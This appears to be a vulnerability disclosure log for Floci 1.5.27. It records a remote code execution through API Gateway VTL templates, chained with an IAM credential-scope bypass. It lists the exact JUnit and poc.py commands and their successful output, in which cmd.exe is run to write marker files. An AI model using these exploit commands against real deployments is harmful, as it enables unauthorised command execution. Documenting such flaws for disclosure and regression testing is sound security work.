Target:
Floci 1.5.27
Original RCE commit analyzed: 238294e779d0cd24835ba04d7bb16b1e1fd15f76
Latest upstream commit rechecked for IAM bypass chain: 7efb280dbcf6f5ea8faab28f1c7d5f8c3f59b4e0

Original JUnit RCE command:
.\mvnw.cmd '-Denforcer.skip=true' '-Dmaven.compiler.release=21' '-Dmaven.compiler.enablePreview=true' '-DargLine=--enable-preview' '-Dtest=ApiGatewayVtlRceExploitTest' test

Original JUnit RCE result:
Tests run: 1, Failures: 0, Errors: 0, Skipped: 0
target\apigw-vtl-rce-marker.txt => FLOCI_APIGW_VTL_RCE

Original standalone PoC command:
python poc.py --host 127.0.0.1 --port 4566 --argv cmd.exe /c "echo FLOCI_STANDALONE_POC>C:/Temp/floci_standalone_poc.txt"

Original standalone PoC result:
[+] REST API id: d1e873f2f8
[+] Resource id: cfd975b9
[+] Trigger response: {"ok":true,"exit":"0"}
[+] Command executed by Floci process
[+] Cleanup delete REST API: HTTP 202
POC_EXIT=0
MARKER_EXISTS=True
C:\Temp\floci_standalone_poc.txt => FLOCI_STANDALONE_POC

IAM bypass regression command:
.\mvnw.cmd -Dtest=ApiGatewayIamBypassRegressionTest test

IAM bypass regression result:
Tests run: 1, Failures: 0, Errors: 0, Skipped: 0
Correct apigateway credential scope was denied:
HTTP 403
IAM enforcement DENY: action=apigateway:POST
Wrong iam credential scope was allowed with the same access key:
Created REST API
Created API Gateway resource
Stored responseTemplates entry
Created deployment and stage
Executed /execute-api/{apiId}/prod/probe
Observed template-controlled HTTP 207 response

Standalone wrong-scope bypass command shape:
python poc.py --host 127.0.0.1 --port 4566 --bypass-iam --auth-access-key AKIAEXAMPLE --argv cmd.exe /c "echo FLOCI_BYPASS_CHAIN>C:/Temp/floci_bypass_chain.txt"